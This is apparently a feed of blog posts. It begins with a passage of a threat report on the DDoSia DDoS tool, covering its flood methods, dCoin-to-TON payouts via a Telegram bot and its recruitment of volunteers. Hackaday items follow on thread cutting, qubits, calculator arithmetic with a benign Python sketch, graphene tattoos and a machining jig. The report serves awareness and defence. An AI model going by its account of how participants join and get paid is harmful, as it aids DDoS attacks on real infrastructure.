- UDP flood: volumetric attacks against game, VoIP and DNS servers.
- TCP SYN flood: saturation of TCP connections to exhaust the targets' resources.
The software lets participants send massive numbers of requests to given targets, overloading them until they become unusable. The interface is designed to be extremely simple, so that even people without advanced technical skills can use it. However, participants have no say in the decisions: the attacks are planned and directed from above, and the volunteers merely carry out the instructions they receive.
The reward system, the dCoin currency and the connection with TON
DDoSia does not rely on volunteering alone, but introduces a system of incentives in the form of an electronic currency called dCoin. Users are rewarded according to their activity, and dCoins can be converted exclusively into TON (Toncoin), a cryptocurrency that can be transferred to digital wallets.
The exclusive use of TON as the conversion currency is no accident: Toncoin is known for its advanced privacy features, which make it harder to trace than other cryptocurrencies. This system gives participants greater anonymity and complicates the authorities' efforts to trace transactions.
The current exchange rate is 1 dCoin = 2 rubles, with the option to exchange these tokens via the Telegram bot @CryptoBot. This economic model has made DDoSia particularly attractive to many participants, who see the activity not only as an ideological act but also as a potential source of income.
Origin of connections and OSINT analysis
Analysis of the connections shows that DDoSia has active nodes mainly in Russia and Eastern Europe, with a significant presence in West and Central Africa as well. This suggests the use of botnets, proxy servers and compromised infrastructure to conceal the traffic. These data are confirmed by an AI-based OSINT model that analyzed the Telegram channels of NoName057(16). The system, using Telethon for scraping, made it possible to monitor suspicious keywords, collect metadata and trace some of the active connections, highlighting operations distributed across multiple regions to evade tracking.
Who is funding it?
The connection between DDoSia and the Russian government has never been explicitly confirmed, but several analyses suggest indirect collaboration through propaganda tools and hidden funding. Another hypothesis that would confirm this connection is the fact that from Russia the use of a VPN is not necessary to take part in the program, suggesting a degree of implicit government protection for those operating from that territory. It should be added that the handling of transactions via Telegram suggests a possible connection with more structured entities, perhaps traceable to government or paramilitary support networks. OSINT investigations, moreover, trace some of the most active users to chats of a military nature.
Legal implications and risks for participants
Taking part in DDoSia is not without risk. Although using a VPN may provide a level of protection, authorities in several countries are stepping up checks to identify and prosecute the perpetrators of DDoS attacks. In many states, such actions are considered computer crimes punishable by heavy penalties.
In addition, the client itself could contain backdoors or malware that the project's operators can use to take control of users' devices. Taking part in these operations therefore exposes volunteers not only to legal risks but also to possible compromise of their own security.
It should be noted that the very Telegram bots used to run the project represent an additional risk to participants' security. They can in fact explore users' personal data and activity, collecting information that could be exploited in other contexts, including surveillance or monitoring by the authorities or by the project's own organizers.
Telegram's moderation
The platform, after the arrest of Pavel Durov in France, began closing channels and groups linked to DDoSia, although it is not clear whether this stems from a real intent to counter them or simply from acting on reports received. However, the groups are reopened under new identities very quickly, allowing the project to continue its activities without significant interruption.
Conclusions
The DDoSia Project is a clear example of how cyber warfare is evolving, turning ordinary users into digital weapons. Its hierarchical structure and its recruitment of cyber-mercenaries indicate a higher level of organization than other volunteer DDoS attacks.
The incentive system, combined with ease of use, makes it a concrete danger for many infrastructures. However, the risks to participants and the countermeasures available suggest that this tactic, however effective in the short term, could meet growing obstacles as defensive strategies evolve.
Overall, DDoSia highlights the need for companies and governments to invest in cybersecurity not only to defend against current attacks, but to anticipate and counter increasingly sophisticated threats in the future of cyber warfare.
The digital war is under way, and we all have a duty to be aware of it.
The article “DDoSia: How Russia Recruits Cyber-Mercenaries on Telegram and Pays Them in Cryptocurrency” comes from il blog della sicurezza informatica.
DaVinci’s New Threads
Last year, we saw [How To Make Everything’s] take on [DaVinci’s] machine for cutting threads. However, they stopped short of the goal, which was making accurate metal screw threads. After much experimentation, they have a working solution. In fact, they tried several different methods, each with varying degrees of success.
Some of the more unusual methods included heating a bar red hot and twisting it, and casting a screw out of bronze. The last actually worked well with a normal screw as the mold, although presumably, a good wood or wax shape would have resulted in a workable mold, too.
The real goal, though, was to make the DaVinci machine more capable on its own. The machine uses leadscrews and can cut its own leadscrews, so, in theory, if you improve the machine, it can cut better components for itself, which may make it possible to cut even better leadscrews.
The reality was the machine required some significant rework to correctly cut metal threads. But it does, as you can see in the video below. With some additional scaling of gears, they were able to cut a 20 TPI threaded rod that would take an off-the-shelf nut.
If you missed the original post on the machine, you can still go back and read it. Of course, once you have a threaded rod, you are just a few steps away from a tap, too.
youtube.com/embed/iDiqUx6joOQ?…
Using Antimony To Make Qubits More Stable
One of the problems with quantum bits, or “qubits”, is that they tend to be rather fragile, with a high sensitivity to external influences. Much of this is due to the atoms used for qubits having two distinct spin states of up or down, along with the superposition. Any disturbing of the qubit’s state can cause it to flip between either spin, erasing the original state. Now antimony is suggested as a better qubit atom by researchers at the University of New South Wales in Australia due to it having effectively eight spin states, as also detailed in the university press release along with a very tortured ‘cats have nine lives’ analogy.
For the experiment, also published in Nature Physics, the researchers doped a silicon semiconductor with a single antimony atom, proving that such an antimony qubit device can be manufactured, with the process scalable to arrays of such qubits. For the constructed device, the spin state is controlled via a transistor constructed on top of the trapped atom. As a next step a device with closely spaced antimony atoms will be produced, which should enable these to cooperate as qubits and perform calculations.
By having the qubit go through many more states to fully flip, these qubits can potentially be much more stable than contemporary qubits. That said, there’s still a lot more research and development to be done before a quantum processor based on this technology can go toe-to-toe with a Commodore 64 to show off the Quantum Processor Advantage. Very likely we’ll be seeing more of IBM’s hybrid classical-quantum systems before that.
Hackaday Links: February 16, 2025
Just when you thought the saga of the Bitcoin wallet lost in a Welsh landfill was over, another chapter of the story appears to be starting. Regular readers will recall the years-long efforts of Bitcoin early adopter James Howells to recover a hard drive tossed out by his ex back in 2013. The disk, which contains a wallet holding about 8,000 Bitcoin, is presumed to be in a landfill overseen by the city council of Newport, which denied every request by Howells to gain access to the dump. The matter looked well and truly settled (last item) once a High Court judge weighed in. But the announcement that the Newport Council plans to cap and close the landfill this fiscal year and turn part of it into a solar farm has rekindled his efforts.
Howells and his investment partners have expressed interest in buying the property as-is, in the hopes of recovering the $780 million-ish fortune. We don’t think much of their odds, especially given the consistently negative responses he’s gotten over the last twelve years. Howells apparently doesn’t fancy his odds much either, since the Council’s argument that closing the landfill to allow him to search would cause harm to the people of Newport was seemingly made while they were actively planning the closure. It sure seems like something foul is afoot, aside from the trove of dirty diapers Howells seeks to acquire, of course.
When all else fails, blame the monkey. The entire nation of Sri Lanka suffered a blackout last Sunday, with a hapless monkey being fingered as the guilty party. The outage began when a transformer at a substation south of the capital city of Colombo went offline. Unconfirmed reports are that a troop of monkeys was fighting, as monkeys do, and unadvisedly brought their tussle over the fence and into the substation yard. At some point, one of the warring animals sought the high ground on top of a transformer, with predictable results. How turning one monkey into air pollution managed to bring down an entire country’s grid is another question entirely.
From the enshittification files comes this horrifying story of in-dashboard ads. Stellantis, maker of Jeep, Dodge, Chrysler, and other brands that can reliably be counted upon to be littered with bad grounds, has decided to start putting full-screen pop-up advertisements on infotainment systems. As if that’s not atrocious enough, the ads will run not just when the car is first started, but every time the vehicle comes to a stop in traffic. The ads will hawk things like extended warranties, at least initially, but we predict it won’t be long before other upsell attempts are made. It would be pretty easy to pull in other data to customize ads, such as an offer to unlock heated seats if the outside temperature gets a little chilly, or even flog a pumpkin spice latte when the GPS shows you’re near a Starbucks. The possibilities are endless, and endlessly revolting, because if one car company does it, the rest will quickly follow. Ad-blocking wizards, this may be your next big target.
And finally, calling all hams, or at least those of us with an interest in digital modes. Our own Al Williams will be making an appearance on the DMR Tech Net to talk about his recent Hackaday article on Digital Mobile Radio. The discussion will be on Monday, February 17 at 00:30 UTC (19:30 EST), on Brandmeister talk group 31266. If you’ve got a DMR-capable radio, DMR Tech Net has a handy guide to getting the talk group into your code plug. If none of that makes any sense, relax: you can still tune in online using this link and the Player button in the upper right. Or, if ham radio isn’t your thing, Al will be making a second appearance the next night but on a Zoom call to discuss “How to Become Rich and (almost) Famous on Hackaday,” which is his collection of tips and tricks for getting your project to catch a Hackaday writer’s eye.
How Hard is it to Write a Calculator App?
How hard can it be to write a simple four-function calculator program? After all, computers are good at math, and making a calculator isn’t exactly blazing a new trail, right? But [Chad Nauseam] will tell you that it is harder than you probably think. His post starts with a screenshot of the iOS calculator app with a mildly complex equation. The app’s answer is wrong. Android’s calculator does better on the same problem.
What follows is a bit of a history lesson and a bit of a math lesson combined. As you might realize, the inherent problem with computers and math isn’t that they aren’t good at it. Floating point numbers have a finite precision and this leads to problems, especially when you do operations that combine large and small numbers together.
Indeed, any floating point representation has a bigger infinity of numbers that it can’t represent than those that it can. But the same is true of a calculator. Think about how many digits you are willing to type in, and how many digits you want out. All you want is for each of them to be correct, and that’s a much smaller set of numbers.
Google’s developer, [Hans-J. Boehm] tackled this problem by turning to recursive real arithmetic (RRA). Here, each math function is told how accurate it needs to be, and a set of rules determines the highest required accuracy.
But every solution brings a problem. With RRA, there is no way to tell very small numbers from zero. So computing “1-1” might give you “0.000000000”, which is correct but upsetting because of all the excess precision. You could try to test if “0.00000000” was equal to “0”, and simplify the output. But testing for equality of two numbers in RRA is not guaranteed to terminate: you can tell if two numbers are unequal by going to more and more precision until you find a difference, but if the numbers happen to be equal, this procedure never ends.
The key realization for [Boehm] and his collaborators was that you could use RRA only for cases where you deal with inexact numbers. Most of the time, the Android calculator deals with rationals. However, when an operation produces a potentially irrational result, it switches to RRA for the approximation, which works because no finite representation ever gets it exactly right. The result is a system that doesn’t show excess precision, but correctly displays all of the digits that it does show.
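The hybrid scheme described above can be sketched in a few lines. This is an added example, not code from [Chad’s] post or [Boehm’s] paper: the `Real` class, `calc_sqrt`, and the other names are hypothetical, and only subtraction and square roots of non-negative rationals are implemented.

```python
from fractions import Fraction
from math import isqrt

class Real:
    """Recursive real: approx(n) returns an int k with |x * 10**n - k| <= 1."""
    def __init__(self, approx):
        self.approx = approx

    @staticmethod
    def of(q):
        q = Fraction(q)
        return Real(lambda n: round(q * 10**n))

    @staticmethod
    def sqrt(q):
        q = Fraction(q)
        return Real(lambda n: isqrt(q.numerator * 10**(2 * n) // q.denominator))

    def __sub__(self, other):
        # Ask each operand for one extra digit so the total error stays under 1.
        return Real(lambda n: round(Fraction(self.approx(n + 1) - other.approx(n + 1), 10)))

def calc_sqrt(q):
    """Stay rational when the root is exact; otherwise switch to a recursive real."""
    q = Fraction(q)  # assumption: q is non-negative
    rn, rd = isqrt(q.numerator), isqrt(q.denominator)
    if rn * rn == q.numerator and rd * rd == q.denominator:
        return Fraction(rn, rd)
    return Real.sqrt(q)

def digits_to_prove_nonzero(x, max_digits):
    """Return the first precision that proves x != 0, or None if the cap is reached."""
    for n in range(1, max_digits + 1):
        if abs(x.approx(n)) > 1:  # the error is at most 1, so x cannot be 0
            return n
    return None  # undecided: x may be 0, or just smaller than we looked

def float_loses_the_one():
    # Large plus small in binary floating point: the 1 is rounded away.
    return (1e16 + 1) - 1e16

def rational_keeps_the_one():
    # The same sum in exact rational arithmetic.
    return (Fraction(10**16) + 1) - Fraction(10**16)

if __name__ == "__main__":
    print(float_loses_the_one(), rational_keeps_the_one())
    print(calc_sqrt(Fraction(9, 4)))  # exact root, stays a Fraction
    near = calc_sqrt(2) - Real.of(Fraction(141421356, 10**8))
    print(digits_to_prove_nonzero(near, 30))  # unequal values are eventually told apart
    zero = calc_sqrt(8) - calc_sqrt(2) - calc_sqrt(2)
    print(digits_to_prove_nonzero(zero, 30))  # a true zero is never proven, at any cap
```

Raising `max_digits` for the last case only makes the search longer, which is the non-terminating equality test the article describes.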
We really like [Chad’s] step-by-step explanation. If you would rather dive into the math, you can read [Boehm’s] paper on the topic. If you ever wonder how many computer systems handle odd functions like sine and cosine, read about CORDIC. Or, avoid all of this and stick to your slide rule.
Graphene Tattoos: The Future of Continuous Health Monitoring?
In the near future, imagine a world where your health is continuously monitored, not through bulky devices but through an invisible graphene tattoo. Developed at the University of Massachusetts Amherst, these tattoos could soon detect a range of health metrics, including blood pressure, stress levels, and even biomarkers of diseases like diabetes. This technology, though still in its infancy, promises to revolutionize how we monitor health, making it possible to track our bodies’ responses to everything from exercise to environmental exposure in real-time.
Graphene, a single layer of carbon atoms, is key to the development of these tattoos. They are flexible, transparent, and conductive, making them ideal for bioelectronics. The tattoos are so thin and pliable that users won’t even feel them on their skin. In early tests, graphene electronic tattoos (GETs) have been used to measure bioimpedance, which correlates with blood pressure and other vital signs. The real breakthrough here, however, is the continuous, non-invasive monitoring that could enable early detection of conditions that usually go unnoticed until it’s too late.
While still requiring refinement, this technology is advancing rapidly. Graphene still amazes us, but it’s no longer just science fiction. Soon, these tattoos could be a part of everyday life, helping individuals track their health and enabling better preventative care. Since we’re hackers out here (though this is a bit far-fetched), combining this knowledge on graphene production with this article on tattooing with a 3D printer could get you on track. Let us know: what would you use graphene biosensors for?
Original photo by engin akyurt on Unsplash
[Quinn Dunki] Makes a Screw Shortener Fit for Kings
It’s a common problem when you’re building anything with screws: this one is too long, this one is too short. While she can’t teach you how to fix the latter, [Quinn Dunki] has made herself an absolutely deluxe screw shortening jig. And while that’s cool and all, the real value here is the journey; watching over [Quinn]’s shoulders while she’s in the machine shop is always illuminating.
First off, she starts with her old jig, which frankly makes us want one. It’s a short piece of aluminum angle stock with threaded holes in it. You thread the screw in as far as you want, and use the edge as a cutting guide. Very nice! But aluminum threads wear out quickly so it works if you’re shortening dozens of screws, but gets wonky when you need to cut hundreds. The new jig is made out of steel, and has a slit that clamps the threads in place so she doesn’t have to hold the tiny screws with her other hand while sawing.
This video is, on the surface, about making an improved tool out of steel. But it’s the tips along the way that make it worth your watch. For instance, “deburr early and often” is a recurring leitmotif here: it keeps the extra bits that form along any cut from messing up edge finding or vise registration. And yeah, she deburrs after every operation.
There are mistakes, and lessons learned along the way. We’re not going to spoil it all. But in the end, it’s a sweet tool that we’ve never seen before.
If you haven’t read [Quinn]’s series on machine tools that she wrote for us, it’s a treasure trove of machining wisdom.
youtube.com/embed/pLca-flylUA?…